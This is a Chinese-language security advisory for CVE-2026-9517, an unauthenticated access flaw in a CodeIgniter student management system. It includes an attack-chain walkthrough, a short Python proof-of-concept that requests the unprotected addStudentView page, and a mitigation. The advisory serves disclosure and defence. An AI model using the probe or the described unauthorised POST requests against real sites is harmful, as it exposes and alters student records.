CVE-2026-9517 CVSS 7.3 高危

CVE-2026-9517: CodeIgniter学生管理系统访问控制漏洞

披露日期: 2026-05-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9517

漏洞类型

访问控制缺失

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

hemant6488 CodeIgniter-StudentManagementSystem

漏洞概述

hemant6488 CodeIgniter-StudentManagementSystem中存在安全漏洞。该漏洞影响学生管理处理程序组件中的`/index.php/students/addStudentView`文件。由于系统对特定功能实施不当的访问控制，远程攻击者无需用户交互即可利用此漏洞。攻击者可通过操纵请求绕过安全限制，导致系统机密性、完整性及可用性受到低程度影响。目前该漏洞已公开且厂商尚未回应。

技术细节

该漏洞的根本原因在于应用程序在`/index.php/students/addStudentView`路径下缺乏有效的身份验证和会话管理机制。根据CVSS向量AV:N/AC:L/PR:N/UI:N，该漏洞属于网络层面的低权限访问缺陷，允许未认证的攻击者直接访问本应受限制的管理功能。在CodeIgniter框架的默认路由配置中，如果控制器方法未添加`is_logged_in`等类似的权限检查钩子，或者未在构造函数中强制执行会话验证，攻击者便可以通过发送直接的HTTP GET或POST请求调用该功能。这种缺陷属于典型的Broken Access Control（失效的访问控制），利用方式简单，无需复杂的绕过技术即可达成未授权操作。

攻击链分析

STEP 1

1. 信息收集

攻击者通过网络侦察发现目标站点使用了hemant6488开发的CodeIgniter-StudentManagementSystem。

STEP 2

2. 漏洞探测

攻击者构造HTTP请求直接访问敏感路径`/index.php/students/addStudentView`，且不携带任何Session或认证Token。

STEP 3

3. 权限绕过

由于后端未对该接口进行权限校验，服务器正常返回了学生管理页面的HTML内容，确认存在访问控制缺陷。

STEP 4

4. 未授权操作

攻击者利用该接口进一步发送POST数据，尝试添加或修改学生信息，破坏数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://target-host/index.php/students/addStudentView"

# Exploit attempt: Accessing restricted view without authentication
# Since PR:N (No Privileges Required), we send a request without cookies.
try:
    response = requests.get(target_url, timeout=10)
    
    # Check if the response indicates successful access (e.g., HTTP 200 and specific content)
    if response.status_code == 200 and "Student" in response.text:
        print("[+] Vulnerability Confirmed: Access control bypass successful.")
        print("[+] Response Content Snippet:")
        print(response.text[:200])
    else:
        print("[-] Target may not be vulnerable or access is blocked.")
        print("Status Code:", response.status_code)
        
except Exception as e:
    print(f"Error occurred: {e}")

影响范围

hemant6488 CodeIgniter-StudentManagementSystem (所有版本)

防御指南

临时缓解措施

建议临时在Web服务器（如Nginx或Apache）配置层面对`/students/`路径实施IP白名单限制或添加Basic Auth认证，以阻断外部未授权访问，直至开发者发布包含身份验证逻辑的代码更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9517
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9517
3 Details https://www.cvedetails.com/cve/CVE-2026-9517/
4 VulDB https://vuldb.com/cve/CVE-2026-9517
5 Link https://github.com/hemant6488/CodeIgniter-StudentManagementSystem/
6 Link https://github.com/hemant6488/CodeIgniter-StudentManagementSystem/issues/5
7 Link https://vuldb.com/submit/814277
8 Link https://vuldb.com/vuln/365537
9 Link https://vuldb.com/vuln/365537/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表